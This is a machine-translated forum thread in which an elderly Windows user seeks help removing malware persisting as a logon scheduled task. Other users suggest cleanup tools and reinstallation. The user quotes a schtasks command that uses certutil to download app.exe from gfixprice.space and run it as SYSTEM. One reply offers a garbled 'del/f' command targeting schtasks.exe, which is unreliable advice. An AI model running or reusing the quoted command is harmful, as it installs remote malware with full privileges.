手助けをしてください-マルウェアが挿入されましたSchTasksに-私はそれを削除することができません.
私はTechではありません-私は77歳で、私のコンピュータを修理する余裕がない.どういうわけか私が病気のサイトを訪問したとき、私はこのマルウェア(他のマルウェアのトンの中で)を拾いました!
これはそれが言うことです(Defenderレポートを介して).
管理プロンプト
C:\Windows\System32\schtasks.exe/create/sc onlogon/rl system/tr cmd.exe/c certutil.exe-urlcache-split-f
https://gfixprice.space/app/app.exe.
c:\users\seebert\appdata\sybert.exe &&c:\users\seebert\appdata\local\temp\csrss\scheduled.exe/31340/tn scheduledupdate
/f
私はMBAMと他のさまざまなプログラムを試しましたが、何もしません.彼らはマルウェアを見せていますがそれを取り除くことはありません.
この完全に破壊的なマルウェアを削除または無効にするには、管理者CMDプロンプトに入れるのに十分な人は十分に親切にしますか.私が起動するたびに実行されると、ディフェンダーはそれを発表するがそれについて何もできない.私はそれにトレーニングはありません
helpには非常に感謝しています.
返信リスト(回答:21)
マイクを削除してコマンドプロンプトを開きますが、管理者として実行してから、これを入力してください
del/fC:\Windows\System32\schtasks.exe/CREATE/SC ONLOGON/RL HIGHEST/RU SYSTEM/TR cmd.exe/C certutil.exe-urlcache-split-f
https://gfixprice.space/app/app.exeC:\Users\Seebert\AppData\Local\Temp\csrss\scheduled.exe
&&C:\Users\Seebert\AppData\Local\Temp\csrss\scheduled.exe/31340/TN ScheduledUpdate/F
応答5# ->にスキップ2 #MikeCoxこんにちは、あなたの提案に感謝します.Chtasks.exeは、受け入れたマルウェアエントリに含まれていたとしても、「CREATE」を認識しません.'DELETE'や他のコマンドを試しましたが、同じ否定的な結果になりました.肝心なのは(悲しいことに)システムが揚げられて
Windowsを再インストールする必要があります.これは、彼らのGURU(本当にいい人)も私に言ったことです.私が最も悲しんでいるのは、この世界には、理由もなく他人のコンピューターを破壊することによって、ある種の病気の個人的な喜びを引き出す人々がいるということです.
何でも.コンピュータ上でそのような作業を行い、それを適切な社会的使用ではなく反社会的使用に使用する能力を持つことは、ハッカーの人生の無駄です.しかし、彼らのミイラによれば、彼はいい子になるか、彼女は本当にいい子になるでしょう.彼らはただ
彼らが教会に行く途中で、他の人々の生活を少し略奪するために立ち寄りました.ええと、私はステージ4(最終ステージ)の肺気腫を患っています.77歳で、私の毎日の世界とのやりとりの99%は、あなたの小さな天使が取ったコンピューターを介したものでした.
ねじ込みのそのような喜び.あなたのミイラはあなたをとても誇りに思うでしょう.おそらく、あなたのお父さんもあなたを誇りに思っているかもしれません-つまり、あなたが存在することを彼らが知っている場合です;-)あなたはおそらくひき逃げ生物学のレッスンでした.
応答2# ->にスキップ1 #Spigoloこんにちはマイク
Autorunsの助けを借りて成功しなかったと思います.
まず、
onedrive
を備えた無料のストレージがあることを忘れました.アクセスするにはMicrosoftアカウントのみが必要であり、クラウド内のデータは常にデバイスと同期されます.ドキュメントをそこに保存してから、最初から再インストールすることをお勧めします.それらは自動的に復元されます.
必要なプログラムがある場合は、それらを再インストールする必要があります.
詳細な手順が必要な場合は、喜んでお手伝いさせていただきます.
応答2# ->にスキップ3 #Techこんにちは、ごめんなさい私たちはあなたを助けることができなかった、あなたはwindowsの再取り付けの助けが必要ですか?実際にPCの製造元によっては、インターネットを使用してBを使用せずにシステムの復元を行うことができる可能性があります.
応答17# ->にスキップ16 #MikeCoxこんにちは.システムの復元は動作しません-それはマルウェアのタスクの一部だったと思います.可能であれば、
Windows 10
のクリーンインストールを喜んで行いますが、貧弱で、失われたプログラムを置き換える経済的能力がないことを願っています.
は、クリーンインストールを実行することに抵抗があることを理解できます.私は他の人の親切によってのみインターネットにアクセスでき、コンピューターで行う他のすべてのことは経済的な負担で管理されています.私は時々閲覧しますが、実際にはコンピューターを使用して小説を書くだけなので、マルウェアの問題があります.私は国で比較的孤立して住んでいて、確かに知らないので、コンピュータに精通した人々との私の唯一の接続はインターネット経由です
コンピュータの技術的な問題について私を助けてくれる地元の人.
応答16# ->にスキップ15 #Techこんにちは、マルウェアがどこにあるか知っているので、あなたの自己を削除することができます.マルウェア、SFC/を使用しようとしましたか
Scannow、管理コマンドプロンプトで?また、このスレッドの手順に従うこともできます.それらはアンチウイルスソフトウェアのリストを使用して、それらのステップに従ってください、そして彼らはあなたを助けるべきです. https://www.reddit.com/r/techsupport/comments/2wuoif/my_pc_has_about_500_schtasksexe_and_conhostexe_in/
応答15# ->にスキップ14 #MikeCoxいいえ、マルウェアがどこにあるのかわかりません.私はWindows Explorer、Regedit、SchTasksを検索しました.私はそれを見ることができません.
はい、もちろんSFC/Scannow(そしてDISM)をやったが、それらが置き換えることができるだけであればどのように助けても構わないとは考えていないため、マルウェアを削除することを目的としていない.
RedDitリンクは5歳で、私はすでにこれらのマルウェアの削除/関連プログラムのすべてを無効にしていません.
SchTasksの使い方を知っているコーダーが私の最初の投稿にリストされている問題を解消するためのDelete Progを書き留める数分を数分費やすことを願っていました.
あなたが私の最初の投稿のプリントアウトからマルウェアがどこにあるのかを私に言うことができるなら(私は言ったように、私はあなたがいないと思います、そしてそれが私たちの両方で私たちがここにいるのです)自分を削除することは非常に満足しています.Windowsフォルダにはありません、
または私が見たコンピュータの他の領域の他のどのフォルダの中でも見ていて、私が見ていると思うことができる場所に見えました.コーダーが書くのが簡単な短いシュタスクはありませんか?
応答14# ->にスキップ11 #SpigoloこんにちはMikeCox5
Autoruns(64または32ビット)をダウンロード、解凍、実行します.
管理者: https://docs.Microsoft.com/ja-jp/sysinternals/downloads/autorunsタブスケジュールされたタスクすべてのエントリを参照し、疑わしいエントリを削除します.よくわからない場合は、こちらからお問い合わせください.
ここでの本当の問題は、マルウェアがすでにWebからペイロードをダウンロードしていることです.再作成される可能性は十分にあります.
実行MalwareBytes そして何かを捕まえるかどうかを確認します.
安全のために、重要なデータはすべて外部ディスクに保存してください.
応答11# ->にスキップ8 #MikeCoxSpigoloに感謝します.ペイロードはおそらく自動的に更新されると思いますが、可能であればコンピューターから取り出したかっただけです.AutorunsZipファイルをダウンロードしました.これは非常に見栄えがします.私が持っているかどうかをあなた(そしてもちろん他のみんな)に知らせます 成功.P.S.私は学校以来、今はイタリア語を話しませんが、敬意を表してgoogleTranslateからイタリア語であなたに手紙を書いています.友達ありがとう.
(Spigoloに感謝します.ペイロードはおそらく自動的に更新されると思いますが、可能であればコンピューターから削除したかっただけです.非常に見栄えのするAutoruns Zipファイルをダウンロードしました.もちろん他のすべて)
成功しました.P.S.私は学生時代からではなく、今はイタリア語を話しませんが、敬意を表してgoogleTranslateからイタリア語であなたに手紙を書きます.友達ありがとう.)
よろしくお願いします、
マイク.
P.P.S.外部(または他の)バックアップディスクがありません-チャンスをつかむ必要があります:-)
応答14# ->にスキップ21 #Techこんにちは、私に戻ってきてくれてありがとう、schtasksは削除する必要があるものではなく、Windowsオペレーティングシステムの一部ですが、マルウェアはschtasksを使用してマルウェアを起動しているため、ほとんどのマルウェアソフトウェアは見つかりません.
応答21# ->にスキップ13 #TechWindows 10を使用していますか?もしそうであれば、Windows Defenderを使用してオフラインScanを実行することができます.これはマルウェアを見つけて削除する必要があります. support.microsoft.com/ja-jp/help/17466... or
あなたがあなたがこのビデオを見ることができれば https://www.youtube.com/watch?v= w843wvt6ptc. これは、Defenderがすでにマルウェアを見つけているので、それが削除することができます.
Defenderのオフラインモードでは、実際にはWindowsにはいません.これがうまくいくと更新してください.
応答13# ->にスキップ9 #MikeCox
Windows 10
(1909).Defenderを使用してオフラインScanを実行しましたが、そのうちのいくつかは、スケジュールされた(そして明らかに正当な)タスクをwithinschtasks.exeから削除しません
実行は、インターネットに接続されているときと接続されていないときに完了しました.
このボードにアクセスしてschtasks.exeからこのマルウェアを削除するための短いスクリプトを作成できる
Windows 10
の第一人者はいませんか:schtasks.exe/CREATE/SC ONLOGON/RL HIGHEST/RU SYSTEM/TR cmd.exe/C certutil.exe-urlcache-split-fhttps://gfixprice.space/app/app.exe
C:\Users\Seebert\AppData\Local\Temp\csrss\scheduleed.exe
&&C:\Users\Seebert\AppData\Local\Temp\csrss\scheduled.exe/31340/TN ScheduledUpdate/F
スクリプトを作成しようとしましたが、実行しようとしたときに得られたのは
Access Denied
だけでした.私が言ったように、私は77歳の恐竜ユーザーであり、技術者ではありません.
応答9# ->にスキップ10 #CassandWindowsの第一人者に連絡するには、Windows 10
の「gethelp」アプリを使用します.仮想エージェントが開いたら、問題を応答させてから、相手に話しかけてもらいます.
応答10# ->にスキップ6 #MikeCoxこんにちは、カサンドラ.投稿ありがとうございます.
より良い時代に(財政的に)私はかつて人と話すように頼みましたが、料金があり、実体のないものではありませんでした.今日は料金を払えなかったので、彼らがこのサービスの料金を請求しているかどうか(私が期待しているように)知っているでしょうか.
アイデアが不足しています.別のユーザーがお手伝いできるかもしれません.
Microsoft Safety Scannerをダウンロードして、ウイルスによる変更を元に戻してみてください.
次のリンクをクリックしてください:https://docs.Microsoft.com/ja-jp/Windows/securi...
応答20# ->にスキップ19 #MikeCoxこんにちは.返信とリンクの投稿に感謝します.残念ながら、私はすでにSafety Scanner(および悪意のあるソフトウェアの削除ツール5.82.170462)を実行しており、どちらのScanでも、望ましくない可能性のあるものは何も検出されていないと述べています.
前述のように、私は決してIT担当者ではありませんが、「既成の」答えは見つからないようです.関連するschtasksの「コマンドライン」を作成するには技術者が必要だと思います(正しいものがないことを許してください)
用語)次に、昇格されたプロンプトを介してschtasksにフィードします.これらは、同時に検出されたマルウェアの他のビットの(ほんの一部)です.マルウェア爆弾が爆発したようなもので、理由はわかりません.(または、他の人を傷つけてジョリーを取得するのはどのような人ですか):
ファイル:C:\Users\Seebert\AppData\Local\Temp\q1dilmdyig4\sktxbjmv1an.dll
ファイル:C:\Users\Seebert\AppData\Local\Temp\is-BNM3V.tmp\BubbleBrowserMaintenance.exe
ファイル:
C:\Users\Seebert\AppData\Local\Temp\is-P4NNJ.tmp\BubbleBrowserMaintenance.exe
https://docs.Microsoft.com/ja-jp/Windows/Win32/taskschd/schtasks
このページを理解して、自分でやるが、(古代の)ギリシャ語で書かれた方がいいかもしれない.または多分私はただ愚かです.